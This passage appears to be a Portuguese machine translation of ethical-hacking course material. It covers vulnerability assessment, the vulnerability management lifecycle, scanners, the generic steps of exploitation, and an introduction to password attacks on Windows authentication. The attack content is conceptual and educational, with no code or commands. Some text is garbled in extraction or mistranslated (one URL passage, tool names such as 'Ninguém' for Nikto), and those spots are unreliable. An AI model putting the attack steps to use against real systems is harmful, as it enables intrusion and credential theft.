sistema da organização quanto a vulnerabilidades, como patches ausentes, serviços desnecessários, autenticação
fraca e criptografia fraca. Os profissionais de avaliação de rede usam firewalls e scanners de rede, como o Nessus.
Esses scanners identificam portas abertas, reconhecem os serviços em execução nessas portas e detectam
vulnerabilidades associadas a esses serviços. Essas avaliações ajudam as organizações a identificar pontos de
entrada e ataque em uma rede, pois seguem o caminho e a abordagem do hacker. Eles ajudam as organizações a
determinar como os sistemas são vulneráveis a ataques de Internet e intranet e como um invasor pode obter acesso
a informações importantes. Uma avaliação de rede típica conduz os seguintes testes em uma rede:
o Verifica as topologias de rede para configuração de firewall inadequada
o Examina as regras de filtragem do roteador
o Identifica servidores de banco de dados configurados de forma inadequada
o Testa serviços e protocolos individuais, como HTTP, SNMP e FTP
o Analisa o código-fonte HTML em busca de informações desnecessárias
o Executa verificação de limites em variáveis
ÿ Avaliação de Candidatura
Uma avaliação de aplicativo se concentra em aplicativos da Web transacionais, aplicativos de servidor cliente
tradicionais e sistemas híbridos. Ele analisa todos os elementos de uma infraestrutura de aplicativo, incluindo
implantação e comunicação no cliente e no servidor.
Esse tipo de avaliação testa a infraestrutura do servidor da Web em busca de configurações incorretas, conteúdo
desatualizado ou vulnerabilidades conhecidas. Os profissionais de segurança usam ferramentas comerciais e de
código aberto para realizar essas avaliações.
ÿ Avaliação da Base de Dados
Uma avaliação de banco de dados é qualquer avaliação focada em testar os bancos de dados quanto à presença de
qualquer configuração incorreta ou vulnerabilidades conhecidas. Essas avaliações concentram-se principalmente em
testar várias tecnologias de banco de dados como MYSQL, MSSQL, ORACLE e POSTGRESQL para identificar
exposição de dados ou vulnerabilidades do tipo injeção. Os profissionais de segurança usam ferramentas comerciais
e de código aberto para realizar essas avaliações.
ÿ Avaliação de Rede Wireless
A avaliação de rede sem fio determina as vulnerabilidades nas redes sem fio de uma organização. No passado, as
redes sem fio usavam mecanismos de criptografia de dados fracos e defeituosos. Agora, os padrões de rede sem fio
evoluíram, mas muitas redes ainda usam mecanismos de segurança fracos e desatualizados e estão abertas a ataques.
As avaliações de rede sem fio tentam atacar os mecanismos de autenticação sem fio e obter acesso não autorizado.
Esse tipo de avaliação testa redes sem fio e identifica redes não autorizadas que possam existir dentro do perímetro
de uma organização. Essas avaliações auditam sites especificados pelo cliente com uma rede sem fio. Eles farejam o
tráfego da rede sem fio e tentam quebrar as chaves de criptografia. Os auditores testam outro acesso à rede se
obtiverem acesso à rede sem fio.

ÿ Avaliação Distribuída
Esse tipo de avaliação, empregado por organizações que possuem ativos como servidores e clientes em
diferentes localizações, envolve a avaliação simultânea dos ativos distribuídos da organização, como aplicativos
cliente e servidor, utilizando técnicas de sincronização apropriadas. A sincronização desempenha um papel
crítico neste tipo de avaliação. Ao sincronizar as execuções de teste juntas, todos os ativos separados situados
em vários locais podem ser testados ao mesmo tempo.
ÿ Avaliação Credenciada
A avaliação credenciada também é chamada de avaliação autenticada. Nesse tipo de avaliação, o profissional
de segurança possui as credenciais de todas as máquinas presentes na rede avaliada. As chances de encontrar
vulnerabilidades relacionadas a sistemas operacionais e aplicativos são maiores na avaliação credencial do
que na avaliação não credencial. Esse tipo de avaliação é desafiador, pois não está muito claro quem possui
ativos específicos em grandes empresas e, mesmo quando o profissional de segurança identifica os
proprietários reais dos ativos, o acesso às credenciais desses ativos é altamente complicado, pois os
proprietários dos ativos geralmente não compartilham tais informações confidenciais. Além disso, mesmo que
o profissional de segurança adquira com sucesso todas as credenciais necessárias, manter a lista de senhas é
uma tarefa enorme, pois pode haver problemas com coisas como senhas alteradas, erros de digitação e
privilégios administrativos. Embora seja a melhor maneira de avaliar vulnerabilidades em uma rede corporativa
de destino e seja altamente confiável, é uma avaliação complexa e desafiadora.
ÿ Avaliação Não Credenciada
A avaliação não credenciada, também chamada de avaliação não autenticada, fornece uma visão geral rápida
dos pontos fracos analisando os serviços de rede expostos pelo host.
Como é uma avaliação sem credencial, um profissional de segurança não exige nenhuma credencial para os
ativos realizarem suas avaliações. Esse tipo de avaliação gera um breve relatório sobre as vulnerabilidades;
no entanto, não é confiável porque não fornece informações mais profundas sobre as vulnerabilidades do
sistema operacional e do aplicativo que não são expostas pelo host à rede. Essa avaliação também é incapaz
de detectar as vulnerabilidades potencialmente cobertas por firewalls. É propenso a resultados falso-positivos
e não é eficaz de forma confiável em comparação com a avaliação baseada em credenciais.
ÿ Avaliação Manual
Depois de executar a varredura de rede e obter informações cruciais, se o profissional de segurança realizar
pesquisas manuais para explorar as vulnerabilidades ou fraquezas, ele classificará manualmente as
vulnerabilidades e as pontuará referindo-se aos padrões de pontuação de vulnerabilidade como CVSS e bancos
de dados de vulnerabilidade como CVE e CWE.
Essa avaliação é considerada manual.
ÿ Avaliação Automatizada
Uma avaliação em que um profissional de segurança usa ferramentas de avaliação de vulnerabilidade, como
Nessus, Qualys ou GFI LanGuard para realizar uma avaliação de vulnerabilidade do destino é

chamado de avaliação automatizada. Ao contrário das avaliações manuais, neste tipo de

avaliação, o profissional de segurança não realiza footprinting e varredura de rede. Eles
empregam ferramentas automatizadas que podem realizar todas essas atividades e
também são capazes de identificar pontos fracos e pontuações CVSS, adquirir informações
críticas de CVE/CWE relacionadas à vulnerabilidade e sugerir estratégias de correção.

Ciclo de vida do gerenciamento de vulnerabilidades
IDÉIA
Monitor
Identificar
Ativos e
Crio Vulnerabilidade Risco Remediação Verificação
Varredura Avaliação
uma linha de base
Ciclo de vida do gerenciamento de vulnerabilidades
O ciclo de vida do gerenciamento de vulnerabilidades é um processo importante que ajuda a identificar e corrigir
os pontos fracos da segurança antes que eles possam ser explorados. Isso inclui definir a postura e as políticas
de risco para uma organização, criar uma lista completa de ativos de sistemas, verificar e avaliar o ambiente em
busca de vulnerabilidades e exposições e tomar medidas para mitigar as vulnerabilidades identificadas. A
implementação de um ciclo de vida de gerenciamento de vulnerabilidades ajuda a obter uma perspectiva
estratégica em relação a possíveis ameaças à segurança cibernética e torna os ambientes de computação
inseguros mais resistentes a ataques.
O gerenciamento de vulnerabilidades deve ser implementado em todas as organizações, pois avalia e controla
os riscos e vulnerabilidades no sistema. O processo de gerenciamento examina continuamente os ambientes de
TI em busca de vulnerabilidades e riscos associados ao sistema.
As organizações devem manter um programa adequado de gerenciamento de vulnerabilidades para garantir a

segurança geral das informações. O gerenciamento de vulnerabilidades fornece os melhores resultados quando
é implementado em uma sequência de fases bem organizadas.
As fases envolvidas no gerenciamento de vulnerabilidades são:
ÿ Identificar ativos e criar uma linha de base
Esta fase identifica os ativos críticos e os prioriza para definir o risco com base na criticidade e no valor
de cada sistema. Isso cria uma boa linha de base para o gerenciamento de vulnerabilidades. Esta fase
envolve a coleta de informações sobre os sistemas identificados para entender as portas aprovadas,
software, drivers e configuração básica de cada sistema para desenvolver e manter uma linha de base
do sistema.

ÿ Varredura de Vulnerabilidade
Esta fase é muito crucial no gerenciamento de vulnerabilidades. Nesta etapa, o analista de segurança realiza
a varredura de vulnerabilidade na rede para identificar as vulnerabilidades conhecidas na infraestrutura da
organização. As varreduras de vulnerabilidade também podem ser executadas em modelos de conformidade
aplicáveis para avaliar os pontos fracos da infraestrutura da organização em relação às respectivas diretrizes
de conformidade.
ÿ Avaliação de Risco
Nesta fase, todas as incertezas graves associadas ao sistema são avaliadas e priorizadas, e a correção é
planejada para eliminar permanentemente as falhas do sistema. A avaliação de risco resume a vulnerabilidade
e o nível de risco identificados para cada um dos ativos selecionados. Ele determina se o nível de risco para
um determinado ativo é alto, moderado ou baixo. A correção é planejada com base no nível de risco
determinado. Por exemplo, as vulnerabilidades classificadas como de alto risco são direcionadas primeiro
para diminuir as chances de exploração que afetariam negativamente a organização.
ÿ Remediação
Remediação é o processo de aplicação de correções em sistemas vulneráveis para reduzir o impacto e a

gravidade das vulnerabilidades. Esta fase é iniciada após a implementação bem-sucedida das etapas de linha
de base e avaliação.
ÿ Verificação
Nesta fase, a equipe de segurança realiza uma nova verificação dos sistemas para avaliar se a correção
necessária foi concluída e se as correções individuais foram aplicadas aos ativos afetados. Esta fase dá uma
visibilidade clara da empresa e permite que a equipe de segurança verifique se todas as fases anteriores
foram perfeitamente empregadas ou não.
A verificação pode ser realizada usando vários meios, como sistemas de emissão de bilhetes, scanners e
relatórios.
ÿ Monitorar
As organizações precisam realizar monitoramento regular para manter a segurança do sistema. Eles usam
ferramentas como IDS/IPS e firewalls. O monitoramento contínuo identifica possíveis ameaças e quaisquer
novas vulnerabilidades que evoluíram. De acordo com as melhores práticas de segurança, todas as fases do
gerenciamento de vulnerabilidades devem ser executadas regularmente.

Ferramentas de Avaliação de Vulnerabilidade: Qualys Vulnerability

Gerenciamento
ÿ Um serviço baseado em nuvem

que oferece imediato
visibilidade global das
áreas do sistema de TI que
podem ser vulneráveis às
ameaças mais recentes da
Internet e como protegê-las
ÿ Auxilia no contínuo
identificação de ameaças e
monitoramento de mudanças
inesperadas em uma rede
antes que se tornem violações
https:// www.qualys.com
Ferramentas de avaliação de vulnerabilidade: OpenVAS e

GFI LanGuardName
Uma estrutura de vários serviços e Varre, detecta, avalia e retifica

GFI
vulnerabilidades de segurança em uma
ferramentas que oferece uma solução LanGuardName
OpenVAS rede e dispositivos conectados
abrangente e poderosa de verificação e
gerenciamento de vulnerabilidades
https:// www.gfi.com
https:// www.openvas.org

Outras ferramentas de avaliação de vulnerabilidade
Acunetix Web
Nesso
Ninguém Qualys FreeScan Vulnerabilidade Nexpose
Profissional https:// cirt.net https:// freescan.qualys.com
scanner https:// www.rapid7.com
https:// www.tenable.com
https:// www.acunetix.com
N-Stalker Web
Scanner de segurança SAINT Security
beSECURE (AVDS) Impacto principal Segurança de aplicativos
de rede https:// Suite https:// https:// www.beyondsecurity.com https:// www.coresecurity.com
www.beyondtrust.com www.carson-saint.com scanner
https:// www.nstalker.com
Ferramentas de avaliação de vulnerabilidade
Um invasor executa a verificação de vulnerabilidade para identificar brechas de segurança na rede de destino
que podem ser exploradas para lançar ataques. Os analistas de segurança podem usar ferramentas de
avaliação de vulnerabilidade para identificar pontos fracos presentes na postura de segurança da organização
e remediar as vulnerabilidades identificadas antes que um invasor as explore.
Os scanners de vulnerabilidade de rede ajudam a analisar e identificar vulnerabilidades na rede de destino ou

nos recursos de rede usando avaliação de vulnerabilidade e auditoria de rede. Essas ferramentas também
ajudam a superar os pontos fracos da rede, sugerindo várias técnicas de correção.
A seguir estão algumas das ferramentas de avaliação de vulnerabilidade mais eficazes:
ÿ Gestão de Vulnerabilidade Qualys
Fonte: https:// www.qualys.com
O Qualys VM é um serviço baseado em nuvem que fornece visibilidade global imediata sobre onde os
sistemas de TI podem estar vulneráveis às ameaças mais recentes da Internet e como protegê-los. Ele
ajuda a identificar ameaças continuamente e monitorar mudanças inesperadas em uma rede antes que
elas se transformem em violações.

Figura 3.17: Varredura de vulnerabilidade usando Qualys Vulnerability Management
ÿ VAS aberto
Fonte: https:// www.openvas.org
O OpenVAS é uma estrutura de vários serviços e ferramentas que oferecem uma solução abrangente
e poderosa de verificação e gerenciamento de vulnerabilidades. A estrutura faz parte da solução de
gerenciamento de vulnerabilidade comercial da Greenbone Network, cujos desenvolvimentos têm
contribuído para a comunidade de código aberto desde 2009.
O verificador de segurança real é acompanhado por um feed atualizado regularmente de testes de

vulnerabilidade de rede (NVTs), mais de 50.000 no total.

Figura 3.18: Varredura de vulnerabilidade usando OpenVAS
ÿ GFI LanGuard
Fonte: https:// www.gfi.com
O GFI LanGuard verifica, detecta, avalia e corrige vulnerabilidades de segurança em uma rede e seus
dispositivos conectados. Isso é feito com esforço administrativo mínimo. Isto
verifica os sistemas operacionais, ambientes virtuais e aplicativos instalados por meio de bancos de dados de
verificação de vulnerabilidade. Ele permite a análise do estado de segurança da rede, identifica riscos e
oferece soluções antes que o sistema possa ser comprometido.

Figura 3.19: Verificação de vulnerabilidade usando GFI LanGuard
Listadas abaixo estão algumas das ferramentas adicionais de avaliação de vulnerabilidade:
ÿ Nessus Professional (https:// www.tenable.com)

ÿ Ninguém (https:// cirt.net)
ÿ Qualys FreeScan (https:// freescan.qualys.com)
ÿ Acunetix Web Vulnerability Scanner (https:// www.acunetix.com)
ÿ Nexpose (https:// www.rapid7.com)
ÿ Network Security Scanner (https:// www.beyondtrust.com)
ÿ SAINT Security Suite (https:// www.carson-saint.com)
ÿ beSECURE (AVDS) (https:// www.beyondsecurity.com)
ÿ Core Impact Pro (https:// www.coresecurity.com)
ÿ N-Stalker Web Application Security Scanner (https:// www.nstalker.com)

ÿ A exploração de vulnerabilidades envolve a execução de múltiplas

etapas complexas e inter-relacionadas para obter acesso a um sistema remoto
Vulnerabilidade ÿ As etapas envolvidas são as seguintes:
Exploração
01 Identifique a vulnerabilidade
02 Determinar o risco associado à vulnerabilidade
03 Determinar a capacidade da vulnerabilidade
04 Desenvolva a exploração
05 Selecione o método de entrega – local ou remoto
06 Gerar e entregar a carga útil
07 Obtenha acesso remoto
Exploração de Vulnerabilidade
A exploração de vulnerabilidade envolve a execução de várias etapas complexas e inter-relacionadas para
obter acesso a um sistema remoto. Os invasores podem realizar a exploração somente depois de descobrir
vulnerabilidades nesse sistema de destino. Os invasores usam vulnerabilidades descobertas para desenvolver
explorações e entregar e executar as explorações no sistema remoto.
Etapas envolvidas na exploração de vulnerabilidades:
1. Identifique a vulnerabilidade
Os invasores identificam as vulnerabilidades existentes no sistema de destino usando várias
técnicas, como identificação e reconhecimento, varredura, enumeração e análise de vulnerabilidade.
Depois de identificar os sistemas operacionais usados e os serviços vulneráveis em execução no
sistema de destino, os invasores também usam vários sites de exploração online, como Exploit
Database SecurityFocu s t(phstt:/p/sw

(ht ://www.
we wx.spleocit
u-rity
dbf.occoum e tar vulnerabilida
s.)com) para detec sisdteesmeas
m
operacionais e aplicativos subjacentes.
2. Determinar o risco associado à vulnerabilidade

Depois de identificar uma vulnerabilidade, os invasores determinam o risco associado à
vulnerabilidade, ou seja, se a exploração dessa vulnerabilidade sustenta as medidas de
segurança no sistema de destino.
3. Determine a capacidade da vulnerabilidade
Se o risco for baixo, os invasores podem determinar a capacidade de explorar essa vulnerabilidade
para obter acesso remoto ao sistema de destino.

4. Desenvolva o exploit
Depois de determinar a capacidade da vulnerabilidade, os invasores usam explorações de sites de

exploração online, como Exploit Database (https:// www.exploit-db.com), ou desenvolvem suas
próprias explorações usando ferramentas de exploração, como Metasploit.
5. Selecione o Método de Entrega – Local ou Remoto
Os invasores realizam exploração remota em uma rede para explorar a vulnerabilidade existente no
sistema remoto para obter acesso ao shell. Se os invasores tiverem acesso prévio ao sistema, eles
realizarão exploração local para escalar privilégios ou executar aplicativos no sistema de destino.
6. Gerar e entregar a carga útil
Os invasores, como parte da exploração, geram ou selecionam cargas maliciosas usando ferramentas
como o Metasploit e as entregam ao sistema remoto usando engenharia social ou por meio de uma
rede. Os invasores injetam shellcode malicioso nas cargas que, quando executadas, estabelecem um
shell remoto para o sistema de destino.
7. Obtenha acesso remoto
Depois de gerar a carga útil, os invasores executam a exploração para obter acesso remoto ao shell
do sistema de destino. Agora, os invasores podem executar vários comandos maliciosos no shell
remoto e controlar o sistema.

Resumo do Módulo
01 Este módulo discutiu ameaças e fontes de ameaças
02 Também discutiu em detalhes sobre malware e seus tipos
03 Este módulo forneceu uma visão geral das contramedidas de malware
Este módulo também discutiu em detalhes sobre vulnerabilidades e classificação de

04 vulnerabilidades
Por fim, este módulo terminou com uma discussão detalhada dos conceitos de avaliação de
05 vulnerabilidade, como pesquisa de vulnerabilidade, sistemas e bancos de dados de pontuação de
vulnerabilidade, ciclo de vida de gerenciamento de vulnerabilidade e exploração de vulnerabilidade
No próximo módulo, discutiremos em detalhes várias técnicas e contra-medidas para a

06 captura de senhas.
Resumo do Módulo
Este módulo discutiu ameaças e fontes de ameaças. Ele também discutiu em detalhes o malware e seus
tipos. Ele também forneceu uma visão geral das contramedidas de malware. Este módulo também discutiu
em detalhes vulnerabilidades e classificação de vulnerabilidades. Finalmente, o módulo terminou com uma
discussão detalhada sobre conceitos de avaliação de vulnerabilidade, como pesquisa de vulnerabilidade,
sistemas e bancos de dados de pontuação de vulnerabilidade, ciclo de vida de gerenciamento de
vulnerabilidade e exploração de vulnerabilidade.
No próximo módulo, discutiremos em detalhes as várias técnicas de quebra de senha e

contramedidas.
MT
CE-Conselho
EC-Council
E
Ethical
HE
Hacking Essentials
Módulo 04
Técnicas de quebra de senha e contramedidas

Objetivos do módulo Ideia criativa
Entendendo a quebra de senha e

1 Complexidade da senha
2 Compreendendo a autenticação da Microsoft
3 Compreendendo vários tipos de ataques de senha
4 Visão geral das ferramentas de quebra de senha
5 Entendendo as contramedidas contra ataques de senha
A seleção de senha fraca tem sido a falha de segurança mais comum enfrentada por organizações e indivíduos nos
últimos tempos. Os invasores usam muitas técnicas e ferramentas sofisticadas para quebrar senhas e obter acesso a
redes e sistemas críticos. Uma compreensão profunda das técnicas de quebra de senha e as medidas defensivas
correspondentes podem ajudar indivíduos e organizações a criar políticas de senha fortes e proteger informações
pessoais ou corporativas.
Este módulo começa com uma visão geral de quebra de senha e complexidade de senha. Ele fornece uma visão sobre
várias técnicas de quebra de senha. Posteriormente, o módulo discute várias ferramentas de quebra de senha e
termina com uma breve discussão sobre quebra de senha
contramedidas.
ÿ Entenda a quebra de senha e a complexidade da senha
ÿ Descrever os mecanismos de autenticação da Microsoft
ÿ Explicar vários tipos de ataques de senha
ÿ Use diferentes ferramentas de quebra de senha
ÿ Adotar contramedidas contra ataques de quebra de senha

Fluxo do módulo
Discutir quebra de senha

1 Técnicas

2 Ferramentas

3 Contramedidas
Discutir técnicas de quebra de senha

Os invasores estão descobrindo novas técnicas sofisticadas de quebra de senhas, por meio das quais
até mesmo senhas fortes são quebradas. Esta seção apresenta uma visão geral da quebra de senha
e sua complexidade. Ele discute vários tipos de ataques de senha.

Senha
Rachaduras
Técnicas de quebra de senha são Os invasores usam A maioria das técnicas de quebra
usadas para recuperar técnicas de quebra de de senha são bem-sucedidas por
senhas de sistemas de senha para obter acesso causa de senhas fracas ou fáceis
computador não autorizado a sistemas vulneráveis de adivinhar
Quebra de senha
A quebra de senha é o processo de recuperação de senhas dos dados transmitidos por um sistema de
computador ou dos dados armazenados nele. O objetivo de quebrar uma senha pode ser ajudar um
usuário a recuperar uma senha esquecida ou perdida, como uma medida preventiva dos administradores
do sistema para verificar se há senhas facilmente quebráveis ou para uso por um invasor para obter
acesso não autorizado ao sistema.
A invasão geralmente começa com tentativas de quebra de senha. Uma senha é uma informação chave
necessária para acessar um sistema. Consequentemente, a maioria dos invasores usa técnicas de
quebra de senha para obter acesso não autorizado. Um invasor pode quebrar uma senha manualmente,
adivinhando-a ou usar ferramentas e técnicas automatizadas, como um dicionário ou um método de
força bruta. A maioria das técnicas de quebra de senha são bem-sucedidas por causa de senhas fracas
ou fáceis de adivinhar.

Complexidade da senha
1 5
Senhas que contêm Senhas que contêm
letras, caracteres especiais apenas letras POTHMYDE
e números ap1@52
2 6
Senhas que contenham Senhas que contêm apenas
apenas números 23698217 letras e caracteres especiais
bob@&ba
3 4 7
Senhas que contêm Senhas que contêm letras Senhas que contêm apenas
apenas caracteres e números caracteres especiais e
especiais &*#@!(%) conhecer123 números 123@$45
Complexidade da senha
A complexidade da senha desempenha um papel fundamental na melhoria da segurança contra ataques. É o elemento
mais importante que os usuários devem garantir ao criar uma senha. A senha não deve ser simples, pois essas senhas
são propensas a ataques. As senhas que você escolher devem ser sempre complexas, longas e difíceis de lembrar. A
senha que você está definindo para sua conta deve atender aos requisitos de complexidade da configuração de política.
Os caracteres da senha devem ser uma combinação de caracteres alfanuméricos. Os caracteres alfanuméricos
consistem em letras, números, sinais de pontuação e símbolos matemáticos e outros símbolos convencionais.
Veja a implementação a seguir para os caracteres exatos mencionados aqui:
ÿ Senhas que contêm letras, caracteres especiais e números: ap1@52
ÿ Senhas que contenham apenas números: 23698217
ÿ Senhas que contêm apenas caracteres especiais: &*#@!(%)
ÿ Senhas que contenham letras e números: meet123
ÿ Senhas que contenham apenas letras: POTHMYDE
ÿ Senhas que contêm apenas letras e caracteres especiais: bob@&ba
ÿ Senhas que contêm apenas caracteres especiais e números: 123@$45
ÿ Senhas que contenham apenas letras maiúsculas e minúsculas, como: RuNnEr
ÿ Senhas que contenham mais de 20 caracteres compreendendo uma frase: como

Difícil de quebrar com muita facilidade

ÿ Senhas que contêm códigos de atalho ou acrônimos, como L8r_L8rNot2day (ou seja, mais tarde,
depois, não hoje)
ÿ Senhas que contêm palavras usadas com frequência especificando sites, como
ABT2_uz_AMZ! (ou seja, prestes a usar a Amazon!)
ÿ Senhas que contêm as primeiras letras das palavras de uma frase longa, como TffcievwMi16wiwdm5g
(ou seja, o primeiro país estrangeiro que visitei foi o México em 2016, quando estava na 5ª série)

Autenticação da Microsoft
Banco de dados do Gerenciador de contas de segurança (SAM)
S
ÿ O Windows armazena senhas de usuário no SAM ou no Active Directory
banco de dados em domínios
ÿ As senhas nunca são armazenadas em texto não criptografado e são hash, e os resultados
são armazenados no SAM
Autenticação NTLM
ÿ Os tipos de protocolo de autenticação NTLM são os seguintes:
N protocolo de autenticação NTLM e protocolo de autenticação LM

ÿ Esses protocolos armazenam a senha do usuário no banco de dados SAM
usando diferentes métodos de hash
Autenticação Kerberos
ÿ A Microsoft atualizou seu protocolo de autenticação padrão para
k Kerberos que fornece uma autenticação mais forte para aplicativos cliente/servidor do que o
NTLM
Autenticação da Microsoft
Quando os usuários fazem login em um computador com Windows, uma série de etapas são executadas para autenticação do
usuário. O sistema operacional Windows autentica seus usuários com a ajuda de três mecanismos (protocolos) fornecidos pela
Microsoft.
ÿ Banco de Dados do Gerenciador de Contas de Segurança (SAM)
O Windows usa o banco de dados do Security Accounts Manager (SAM) ou o banco de dados do Active Directory para
gerenciar contas de usuário e senhas em formato de hash (um hash unidirecional).
O sistema não armazena as senhas em formato de texto simples, mas em formato hash, para protegê-las de ataques. O
sistema implementa o banco de dados SAM como um arquivo de registro, e o kernel do Windows obtém e mantém um
bloqueio de sistema de arquivos exclusivo no arquivo SAM.
Como esse arquivo consiste em um bloqueio de sistema de arquivos, isso fornece alguma medida de segurança para o
armazenamento de senhas.
Não é possível copiar o arquivo SAM para outro local no caso de ataques online.
Como o sistema bloqueia o arquivo SAM com um bloqueio de sistema de arquivos exclusivo, um usuário não pode copiá-
lo ou movê-lo enquanto o Windows estiver em execução. O bloqueio não é liberado até que o sistema lance uma exceção
de tela azul ou o sistema operacional seja desligado. No entanto, para disponibilizar os hashes de senha para ataques
offline de força bruta, os invasores podem despejar o conteúdo do disco do arquivo SAM usando várias técnicas.
Mesmo que os hackers usem técnicas de subterfúgio para descobrir o conteúdo, as chaves criptografadas com um hash
unidirecional dificultam a invasão. Além disso, algumas versões possuem uma chave secundária, o que torna a criptografia
específica para aquela cópia do SO.

ÿ Autenticação NTLM
NT LAN Manager (NTLM) é um esquema de autenticação padrão que executa a autenticação usando uma
estratégia de desafio/resposta. Como não depende de nenhuma especificação de protocolo oficial, não há
garantia de que funcione efetivamente em todas as situações. Além disso, foi usado em algumas instalações
do Windows, onde funcionou com sucesso. A autenticação NTLM consiste em dois protocolos: o protocolo
de autenticação NTLM e o protocolo de autenticação LAN Manager (LM). Esses protocolos usam diferentes
metodologias de hash para armazenar as senhas dos usuários no banco de dados do SAM.
ÿ Autenticação Kerberos
Kerberos é um protocolo de autenticação de rede que fornece autenticação forte para aplicativos cliente/
servidor por meio de criptografia de chave secreta. Este protocolo fornece autenticação mútua, na medida
em que tanto o servidor quanto o usuário verificam a identidade um do outro.
As mensagens enviadas por meio do protocolo Kerberos são protegidas contra ataques de repetição e
espionagem.
O Kerberos emprega o Key Distribution Center (KDC), que é um terceiro confiável. Isso consiste em duas
partes logicamente distintas: um servidor de autenticação (AS) e um servidor de concessão de tickets (TGS).
O Kerberos usa “tíquetes” para provar a identidade de um usuário.
A Microsoft atualizou seu protocolo de autenticação padrão para Kerberos, que fornece uma autenticação
mais forte para aplicativos cliente/servidor do que o NTLM.
Figura 4.1: captura de tela da autenticação do Windows

Tipos de ataques de senha

Ataques não eletrônicos
O invasor não precisa de conhecimento

técnico para quebrar a senha, por isso é
conhecido como um não-técnico
01
ataque
ÿ Surf de ombro
Ataques online ativos
ÿ Engenharia Social
ÿ Mergulho no Lixão O invasor executa a quebra de senha comunicando-
se diretamente com a máquina da vítima
ÿ Dicionário, força bruta e baseado em regras

Ataque
02
ÿ Ataque de injeção de hash
ÿ Envenenamento LLMNR/NBT-NS
ÿ Trojan/Spyware/Keyloggers
ÿ Adivinhação de Senha
Tipos de ataques de senha (continuação)

Ataques online passivos
O invasor executa a quebra de senha sem se

comunicar com a parte autorizadora ÿ Wire
Sniffing
03
ÿ Ataque Man-in-the-Middle
ÿ Replay Attack
Ataques offline
O invasor copia o arquivo de senha do alvo e tenta

quebrar as senhas em seu próprio sistema em um local
04 diferente
ÿ Rainbow Table Attack (Hashes pré-computados)
ÿ Ataque de rede distribuído
Tipos de ataques de senha

A quebra de senha é um dos estágios cruciais da invasão do sistema. Os mecanismos de quebra
de senha geralmente exploram meios legais para obter acesso não autorizado ao sistema, como
recuperar a senha esquecida de um usuário.

A classificação dos ataques de senha depende das ações do invasor, que são dos quatro tipos a seguir:
ÿ Ataques Não Eletrônicos: Esta é, na maioria dos casos, a primeira tentativa do invasor de obter
senhas do sistema de destino. Ataques não eletrônicos ou não técnicos não requerem nenhum
conhecimento técnico sobre hacking ou exploração de sistema. As técnicas usadas para realizar
ataques não eletrônicos incluem surfe no ombro, engenharia social, mergulho em lixeiras, etc.
ÿ Ataques online ativos: essa é uma das maneiras mais fáceis de obter acesso não autorizado ao
sistema em nível de administrador. Aqui, o invasor se comunica com a máquina de destino para obter
acesso por senha. As técnicas usadas para executar ataques online ativos incluem adivinhação de
senha, dicionário e ataques de força bruta, injeção de hash, envenenamento por LLMNR/NBT-NS,
uso de cavalos de Tróia/spyware/keyloggers, ataques internos de monólogo, ataques de cadeia de
Markov, quebra de senha Kerberos, etc. .
ÿ Ataques Online Passivos: Um ataque passivo é um tipo de ataque ao sistema que não leva a nenhuma
alteração no sistema. Nesse ataque, o invasor não precisa se comunicar com o sistema, mas
monitorar ou registrar passivamente os dados que passam pelo canal de comunicação, de e para o
sistema. Os dados são então usados para invadir o sistema. As técnicas usadas para realizar ataques
on-line passivos incluem sniffing, ataques man-in-the-middle, ataques de repetição, etc.
ÿ Ataques offline: Ataques offline referem-se a ataques de senha nos quais um invasor tenta recuperar
senhas de texto não criptografado de um despejo de hash de senha. Os ataques offline geralmente
consomem muito tempo, mas têm uma alta taxa de sucesso, pois os hashes de senha podem ser
revertidos devido ao seu pequeno espaço de chave e tamanho curto. Os invasores usam hashes pré-
computados de tabelas arco-íris para realizar ataques de rede offline e distribuídos.

Dicionário, força bruta e ataque baseado em regras
Ataque de dicionário Ataque de força bruta Ataque baseado em regras
por ano
Um arquivo de dicionário é O programa tenta todas as Este ataque é usado quando o

carregado no aplicativo de cracking combinações de caracteres invasor obtém alguma informação
executado nas contas de usuário até que a senha seja quebrada sobre a senha
Dicionário, força bruta e ataque baseado em regras
ÿ Ataque de Dicionário
Nesse tipo de ataque, um arquivo de dicionário é carregado em um aplicativo de cracking executado em

contas de usuário. Este dicionário é um arquivo de texto que contém várias palavras do dicionário
comumente usadas como senhas. O programa usa todas as palavras presentes no dicionário para
encontrar a senha. Além de um dicionário padrão, os dicionários dos invasores contêm entradas com
números e símbolos adicionados às palavras (por exemplo, “3 de dezembro! 962”).
Rolos de dedo simples no teclado (“qwer0987”), que muitos acreditam produzir senhas aleatórias e seguras,
estão incluídos nesse dicionário. Os ataques de dicionário são mais úteis do que os ataques de força bruta,
no entanto, o primeiro não pode ser executado em sistemas que usam senhas.
Este ataque é aplicável em duas situações:
o Na análise criptográfica, para descobrir a chave de descriptografia para obter o texto simples de um
texto cifrado
o Na segurança do computador, ignorar a autenticação e acessar o mecanismo de controle do computador

adivinhando senhas
Métodos para melhorar o sucesso de um ataque de dicionário:
o Uso de vários dicionários diferentes, como dicionários técnicos e estrangeiros,

o que aumenta o número de possibilidades
o Uso de manipulação de string junto com o dicionário (por exemplo, se o dicionário contiver a palavra
“sistema”, a manipulação de string cria anagramas como “metsys”, entre outros)

ÿ Ataque de Força Bruta
Em um ataque de força bruta, os invasores tentam todas as combinações de caracteres até que a senha seja
quebrada. Os algoritmos criptográficos devem ser suficientemente reforçados para evitar um ataque de força bruta,
que é definido pela RSA da seguinte forma: “Pesquisa de chave exaustiva, ou pesquisa de força bruta, é a técnica
básica para tentar todas as chaves possíveis até que a chave correta seja identificada .”
Um ataque de força bruta é quando alguém tenta produzir todas as chaves de criptografia de dados para detectar
as informações necessárias. Ainda hoje, apenas aqueles com poder de processamento suficiente poderiam realizar
esse tipo de ataque com sucesso.
A criptoanálise é um ataque de força bruta à criptografia que emprega uma pesquisa no keyspace. Em outras
palavras, testar todas as chaves possíveis é uma das tentativas de recuperar o texto simples usado para produzir
um determinado texto cifrado. A detecção de uma chave ou texto simples que é mais rápido que um ataque de
força bruta é uma forma de quebrar a cifra. Uma cifra é segura se não existir nenhum método para quebrá-la além
de um ataque de força bruta. Em geral, todas as cifras são deficientes em prova matemática de segurança. Se o
usuário escolher as chaves aleatoriamente ou pesquisar aleatoriamente, o texto simples ficará disponível em média
após o sistema ter tentado metade de todas as chaves possíveis.
Algumas das considerações para ataques de força bruta são as seguintes:
o É um processo demorado
o Todas as senhas eventualmente serão encontradas
ÿ Ataque baseado em regras
Os invasores usam esse tipo de ataque quando obtêm alguma informação sobre a senha. Este é um ataque mais
poderoso do que os ataques de dicionário e de força bruta porque o cracker conhece o tipo de senha. Por exemplo,
se o invasor souber que a senha contém um número de dois ou três dígitos, ele poderá usar algumas técnicas
